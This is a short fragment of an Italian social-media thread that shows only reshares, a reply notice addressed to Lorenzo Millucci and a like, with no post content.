Informatica (Italy e non Italy 😁) e Informa Pirata reshared this.
Informa Pirata
in reply to Lorenzo Millucci • •Nicola Pizzamiglio likes this.
Informatica (Italy e non Italy 😁) reshared this.